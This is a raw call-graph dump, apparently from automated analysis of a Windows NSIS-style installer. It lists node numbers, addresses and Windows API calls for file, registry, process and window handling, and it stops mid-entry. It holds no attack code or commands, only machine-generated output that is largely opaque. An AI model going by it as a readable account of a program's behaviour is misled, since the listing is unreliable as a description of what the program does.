4686->4687 4687->4668 4687->4680 4689 405705 GetDlgItem 4688->4689 4690 405723 ShowWindow EnableWindow 4689->4690 4691 40571a 4689->4691 4713 403d85 EnableWindow 4690->4713 4691->4690 4693 40574d EnableWindow 4696 405761 4693->4696 4694 405766 GetSystemMenu EnableMenuItem SendMessageW 4695 405796 SendMessageW 4694->4695 4694->4696 4695->4696 4696->4694 4714 403d98 SendMessageW 4696->4714 4715 406009 lstrcpynW 4696->4715 4699 4057c4 lstrlenW 4700 406805 18 API calls 4699->4700 4701 4057da SetWindowTextW 4700->4701 4702 40139d 80 API calls 4701->4702 4702->4684 4704 405838 CreateDialogParamW 4703->4704 4703->4712 4705 40586b 4704->4705 4704->4712 4706 403d3f 19 API calls 4705->4706 4707 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4706->4707 4708 40139d 80 API calls 4707->4708 4709 4058bc 4708->4709 4709->4675 4710 4058c4 ShowWindow 4709->4710 4711 403daf SendMessageW 4710->4711 4711->4712 4712->4672 4712->4675 4713->4693 4714->4696 4715->4699 4716 4020f9 GetDC GetDeviceCaps 4717 401446 18 API calls 4716->4717 4718 402116 MulDiv 4717->4718 4719 401446 18 API calls 4718->4719 4720 40212c 4719->4720 4721 406805 18 API calls 4720->4721 4722 402165 CreateFontIndirectW 4721->4722 4723 4030dc 4722->4723 4724 4030e3 4723->4724 4726 405f51 wsprintfW 4723->4726 4726->4724 4727 4024fb 4728 40145c 18 API calls 4727->4728 4729 402502 4728->4729 4730 40145c 18 API calls 4729->4730 4731 40250c 4730->4731 4732 40145c 18 API calls 4731->4732 4733 402515 4732->4733 4734 40145c 18 API calls 4733->4734 4735 40251f 4734->4735 4736 40145c 18 API calls 4735->4736 4737 402529 4736->4737 4738 40253d 4737->4738 4739 40145c 18 API calls 4737->4739 4740 4062a3 11 API calls 4738->4740 4739->4738 4741 40256a CoCreateInstance 4740->4741 4742 40258c 4741->4742 4743 40497c GetDlgItem GetDlgItem 4744 4049d2 7 API calls 4743->4744 4749 404bea 4743->4749 4745 404a76 DeleteObject 4744->4745 4746 404a6a SendMessageW 4744->4746 4747 404a81 4745->4747 4746->4745 4750 404ab8 4747->4750 4752 406805 18 API calls 4747->4752 4748 404ccf 4751 404d74 4748->4751 4756 404bdd 4748->4756 4761 404d1e SendMessageW 4748->4761 4749->4748 4759 40484e 5 API calls 4749->4759 4772 404c5a 4749->4772 4755 403d3f 19 API calls 4750->4755 4753 404d89 4751->4753 4754 404d7d SendMessageW 4751->4754 4758 404a9a SendMessageW SendMessageW 4752->4758 4763 404da2 4753->4763 4764 404d9b ImageList_Destroy 4753->4764 4774 404db2 4753->4774 4754->4753 4760 404acc 4755->4760 4762 403dca 8 API calls 4756->4762 4757 404cc1 SendMessageW 4757->4748 4758->4747 4759->4772 4765 403d3f 19 API calls 4760->4765 4761->4756 4767 404d33 SendMessageW 4761->4767 4768 404f6b 4762->4768 4769 404dab GlobalFree 4763->4769 4763->4774 4764->4763 4770 404add 4765->4770 4766 404f1c 4766->4756 4775 404f31 ShowWindow GetDlgItem ShowWindow 4766->4775 4771 404d46 4767->4771 4769->4774 4773 404baa GetWindowLongW SetWindowLongW 4770->4773 4782 404ba4 4770->4782 4785 404b39 SendMessageW 4770->4785 4786 404b67 SendMessageW 4770->4786 4787 404b7b SendMessageW 4770->4787 4781 404d57 SendMessageW 4771->4781 4772->4748 4772->4757 4776 404bc4 4773->4776 4774->4766 4777 404de4 4774->4777 4780 40141d 80 API calls 4774->4780 4775->4756 4778 404be2 4776->4778 4779 404bca ShowWindow 4776->4779 4790 404e12 SendMessageW 4777->4790 4793 404e28 4777->4793 4795 403d98 SendMessageW 4778->4795 4794 403d98 SendMessageW 4779->4794 4780->4777 4781->4751 4782->4773 4782->4776 4785->4770 4786->4770 4787->4770 4788 404ef3 InvalidateRect 4788->4766 4789 404f09 4788->4789 4796 4043ad 4789->4796 4790->4793 4792 404ea1 SendMessageW SendMessageW 4792->4793 4793->4788 4793->4792 4794->4756 4795->4749 4797 4043cd 4796->4797 4798 406805 18 API calls 4797->4798 4799 40440d 4798->4799 4800 406805 18 API calls 4799->4800 4801 404418 4800->4801 4802 406805 18 API calls 4801->4802 4803 404428 lstrlenW wsprintfW SetDlgItemTextW 4802->4803 4803->4766 4804 4026fc 4805 401ee4 4804->4805 4807 402708 4804->4807 4805->4804 4806 406805 18 API calls 4805->4806 4806->4805 4103 4019fd 4104 40145c 18 API calls 4103->4104 4105 401a04 4104->4105 4106 405e7f 2 API calls 4105->4106 4107 401a0b 4106->4107 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 